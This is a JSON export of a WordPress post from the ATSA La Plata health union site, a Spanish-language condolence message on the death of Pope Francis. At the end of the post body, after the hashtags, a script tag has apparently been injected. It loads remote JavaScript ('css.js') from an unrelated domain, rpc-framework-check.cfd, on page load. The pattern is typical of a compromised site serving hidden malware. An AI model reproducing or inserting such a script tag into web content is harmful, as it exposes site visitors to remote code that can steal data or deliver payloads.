{"id":18372,"date":"2025-04-21T15:16:07","date_gmt":"2025-04-21T18:16:07","guid":{"rendered":"http:\/\/atsalaplata.org.ar\/web\/?p=18372"},"modified":"2026-02-02T17:14:46","modified_gmt":"2026-02-02T20:14:46","slug":"hasta-siempre-papa-francisco-descanse-en-paz","status":"publish","type":"post","link":"http:\/\/atsalaplata.org.ar\/web\/2025\/04\/hasta-siempre-papa-francisco-descanse-en-paz\/","title":{"rendered":"Hasta siempre Papa Francisco. Descanse en paz."},"content":{"rendered":"\n<p>Hoy, lunes 21 de abril, desde SANIDAD ATSA La Plata, expresamos con profundo pesar, nuestras condolencias por el fallecimiento del Papa Francisco.<img loading=\"lazy\" decoding=\"async\" height=\"16\" width=\"16\" alt=\"\ud83d\udd4a\" src=\"https:\/\/static.xx.fbcdn.net\/images\/emoji.php\/v9\/tba\/1\/16\/1f54a.png\"><\/p>\n\n\n\n<p><a><\/a>Como gremio de la sanidad, siempre valoramos su compromiso con la justicia social y su defensa de los m\u00e1s vulnerables.<\/p>\n\n\n\n<p>El Papa del pueblo, nos ense\u00f1\u00f3 con gestos simples y palabras profundas que no hay verdad sin amor.<\/p>\n\n\n\n<p>Defendi\u00f3 a los trabajadores\/as, a los humildes, y a los postergados.<\/p>\n\n\n\n<p>Su legado de amor, compasi\u00f3n y servicio nos invita a reflexionar, a ser m\u00e1s solidarios y a construir un mundo m\u00e1s humano y justo.<\/p>\n\n\n\n<p>Que su mensaje siga vivo en cada acto de compasi\u00f3n. Descanse en paz. <img loading=\"lazy\" decoding=\"async\" height=\"16\" width=\"16\" alt=\"\ud83d\ude4f\" src=\"https:\/\/static.xx.fbcdn.net\/images\/emoji.php\/v9\/t80\/1\/16\/1f64f.png\"><\/p>\n\n\n\n<p><a href=\"https:\/\/www.facebook.com\/hashtag\/atsalaplata?__eep__=6&amp;__cft__[0]=AZWZQZ0H58Ym-qTDFv5k97zXiXFEW9qu28jWoeBtspYt8MDF8B72XSwQlnjhnLClt9BrJI701imaz9KtYJDK5GHOosYFfW97QXF37QOXd1bAKcnRVbLn-iLu4Ch4EC7ZNeMnn4nx2L7nkg0ATt5NTaCNgQGqNWJdBL38J6FoNRXSZw&amp;__tn__=*NK-R\">#AtsaLaPlata<\/a><a href=\"https:\/\/www.facebook.com\/hashtag\/siemprejuntoavos?__eep__=6&amp;__cft__[0]=AZWZQZ0H58Ym-qTDFv5k97zXiXFEW9qu28jWoeBtspYt8MDF8B72XSwQlnjhnLClt9BrJI701imaz9KtYJDK5GHOosYFfW97QXF37QOXd1bAKcnRVbLn-iLu4Ch4EC7ZNeMnn4nx2L7nkg0ATt5NTaCNgQGqNWJdBL38J6FoNRXSZw&amp;__tn__=*NK-R\">#SiempreJuntoAVos<\/a><a href=\"https:\/\/www.facebook.com\/hashtag\/papafrancisco?__eep__=6&amp;__cft__[0]=AZWZQZ0H58Ym-qTDFv5k97zXiXFEW9qu28jWoeBtspYt8MDF8B72XSwQlnjhnLClt9BrJI701imaz9KtYJDK5GHOosYFfW97QXF37QOXd1bAKcnRVbLn-iLu4Ch4EC7ZNeMnn4nx2L7nkg0ATt5NTaCNgQGqNWJdBL38J6FoNRXSZw&amp;__tn__=*NK-R\">#PapaFrancisco<\/a><\/p>\n\n\n\n<p><\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>Hoy, lunes 21 de abril, desde SANIDAD ATSA La Plata, expresamos con profundo pesar, nuestras&#8230;<\/p>\n","protected":false},"author":2,"featured_media":18373,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[146,98,147,97,85,148],"tags":[],"class_list":["post-18372","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-destacado","category-home","category-novedades","category-sec-de-cultura","category-sec-de-prensa","category-ultimas-noticias"],"_links":{"self":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18372","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/comments?post=18372"}],"version-history":[{"count":2,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18372\/revisions"}],"predecessor-version":[{"id":20835,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18372\/revisions\/20835"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media\/18373"}],"wp:attachment":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media?parent=18372"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/categories?post=18372"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/tags?post=18372"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}